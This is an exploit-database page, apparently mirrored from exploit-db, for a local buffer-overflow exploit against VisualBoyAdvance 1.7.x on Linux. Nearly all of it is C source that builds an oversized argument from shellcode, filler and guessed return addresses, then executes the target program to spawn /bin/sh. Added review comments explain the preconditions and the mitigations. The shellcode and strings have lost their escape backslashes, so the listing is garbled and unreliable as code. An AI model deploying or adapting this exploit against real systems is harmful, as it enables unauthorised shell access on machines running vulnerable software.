VisualBoyAdvanced 1.7.x – Non SUID Local Shell


漏洞ID 1055386 漏洞类型
发布时间 2005-09-13 更新时间 2005-09-13
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/824
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
VisualBoyAdvanced 1.7.x Buffer Overflow exploit
VBA - WEBSITE : vba.ngemu.com
Found & coded by Qnix - Qnix[at]bsdmail[dot]org
*/

#include <stdlib.h>

/*
 * Payload string that main() copies into the oversized argument it passes
 * to the target program.
 *
 * NOTE(review): as rendered on this page the literals contain no backslash
 * escapes, so each one is plain ASCII text ("x31xc0...") and not the byte
 * sequence the author published; the listing is not a faithful copy.
 *
 * The author labels the first line setuid(). The final seven values
 * (2f 62 69 6e 2f 73 68) are the ASCII codes for "/bin/sh", which matches
 * the "Local Shell" in the page title. The page title also says
 * "Non SUID", i.e. presumably the target is not installed set-uid, so a
 * shell obtained this way would run with the invoking user's own
 * privileges -- confirm against the installation being assessed.
 */
char shellcode[] =
       "x31xc0x31xdbxb0x17xcdx80" /* setuid() */
       "xebx5ax5ex31xc0x88x46x07x31xc0x31xdbxb0x27xcd"
       "x80x85xc0x78x32x31xc0x31xdbx66xb8x10x01xcdx80"
       "x85xc0x75x0fx31xc0x31xdbx50x8dx5ex05x53x56xb0"
       "x3bx50xcdx80x31xc0x8dx1ex89x5ex08x89x46x0cx50"
       "x8dx4ex08x51x56xb0x3bx50xcdx80x31xc0x8dx1ex89"
       "x5ex08x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0c"
       "xcdx80xe8xa1xffxffxffx2fx62x69x6ex2fx73x68";


/*
 * Reports the caller's current stack pointer.
 *
 * The body is a single inline-assembly instruction that moves ESP into EAX;
 * there is no return statement, so the function depends on EAX being the
 * register the compiler uses for the return value. That is specific to
 * 32-bit x86 and is not guaranteed by the C language.
 *
 * main() uses the result as its guess for a stack address in the target
 * process, which only holds when stack addresses are predictable between
 * processes. Address-space layout randomisation removes that assumption.
 */
unsigned long sp(void)
{ __asm__("movl %esp, %eax");}

/*
 * Builds a 2300-byte argument string and executes the program named by
 * argv[1] with that string as its first argument.
 *
 * The string is laid out as: a filler run, then the payload from
 * `shellcode`, then repeated copies of one address value derived from this
 * process's own stack pointer. Presumably the target copies its
 * command-line argument into a fixed-size stack buffer without a length
 * check; the page does not show the vulnerable code.
 *
 * Defensive reading: the approach depends on (a) an unbounded copy of argv
 * data in the target, (b) a predictable stack address and (c) an executable
 * stack. Bounding the copy in the target fixes the root cause; stack
 * protectors, non-executable stacks and address randomisation each remove
 * one of the other preconditions.
 *
 * NOTE(review): only <stdlib.h> is included in the visible listing, so
 * printf, strlen and execl are used without visible declarations.
 *
 * Returns 0, and only if execl() fails (on success it does not return).
 */
int main(int argc, char *argv[])
{
  int i, offset;
  long esp, ret, *addr_ptr;
  char *buffer, *ptr;

  /* With offset fixed at 0, ret is simply this process's stack pointer. */
  offset = 0;
  esp = sp();
  ret = esp - offset;

/*
 * Banner only. The lone "n" characters in the strings are how this page
 * renders them (the escape backslashes are missing). esp and ret are long
 * but are printed with %x, which does not match their type.
 */
if (argc >= 2) {
printf("n ************************************************ n");
printf(" VisualBoyAdvanced 1.7.x BufferOver Flow exploit n");
printf("            by Qnix[at]bsdmail[dot]org      ");
printf("n ************************************************ nn");
printf("[~] Stack pointer (ESP) : 0x%xn", esp);
printf("[~] Offset from ESP     : 0x%xn", offset);
printf("[~] Desired Return Addr : 0x%xnn", ret);
} else {
printf("n ************************************************ n");
printf(" VisualBoyAdvanced 1.7.x BufferOver Flow Exploit n");
printf("            by Qnix[at]bsdmail[dot]org      ");
printf("n ************************************************ nn");
printf("useage : ./vba-exp <VisualBoyAdvanced File> nn");
}
/*
 * NOTE(review): the usage branch does not exit, so with no arguments
 * execution continues and execl() below receives argv[1] == NULL.
 */

/* The allocation result is not checked before it is written through. */
buffer = malloc(2300);

/*
 * Fill the buffer with copies of ret. The counter advances by 4 while each
 * store writes sizeof(long) bytes, so this stays inside the 2300 bytes only
 * where long is 4 bytes wide.
 */
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 2300; i+=4)
{ *(addr_ptr++) = ret; }

/*
 * Overwrite the first 1900 bytes with a filler value. 'x90' is a
 * multi-character constant as rendered here; presumably the published
 * source used a single escaped byte.
 */
for(i=0; i < 1900; i++)
{ buffer[i] = 'x90'; }

/*
 * Copy the payload in at offset 1900, without its terminating NUL.
 * strlen() is re-evaluated on every iteration.
 */
ptr = buffer + 1900;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }

/* Terminate the string so it can be passed as a program argument. */
buffer[2300-1] = 0;

/*
 * Replace this process with the program at argv[1]; the crafted string is
 * its first argument. The argument list is ended with a plain 0 rather
 * than a null pointer cast to char *.
 */
execl(argv[1],"VisualBoyAdvance",buffer,0);

/* Reached only when execl() failed; the failure itself is not reported. */
free(buffer);

  return 0;
}

// milw0rm.com [2005-09-13]
